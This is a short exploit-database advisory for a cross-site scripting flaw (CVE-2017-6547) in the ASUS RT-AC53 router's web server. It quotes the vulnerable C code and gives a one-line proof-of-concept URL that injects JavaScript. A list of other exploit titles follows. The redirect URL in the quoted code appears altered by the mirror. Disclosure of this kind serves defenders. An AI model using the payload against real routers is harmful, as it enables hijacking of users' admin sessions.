ASUSWRT RT-AC53 (3.0.0.4.380.6038) – Cross-Site Scripting

Exploit Database
16 阅读

作者： Bruno Bierbaumer

日期： 2017-03-08
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/41571/

Cross-Site Scripting (XSS)

Component: httpd

CVE: CVE-2017-6547

Vulnerability:

httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.

...

if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
char inviteCode[256];
snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='https://www.exploit-db.com/cloud_sync.asp?flag=%s';</script>", file);
send_page( 200, "OK", (char*) 0, inviteCode, 0);

...
PoC:

http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A

last Exploits
ASUSWRT RT-AC53 (3.0.0.4.380.6038) – Cross-Site Scripting的更多信息

Qcodo Development Framework 0.3.3 – Full Information Disclosure：
InfraPower PPS-02-S Q213V1 – Cross-Site Request Forgery：
TP-Link TD-W8950ND ADSL2+ – Remote DNS Change：
Easy Web Search 4.0 – SQL Injection：
Friends in War The FAQ Manager – ‘question’ SQL Injection：
Verizon Fios Router MI424WR-GEN3I – Cross-Site Request Forgery：
Alienvault Open Source SIEM (OSSIM) – ‘Timestamp’ Directory Traversal：
The Pacer Edition CMS 2.1 – ’email’ Cross-Site Scripting：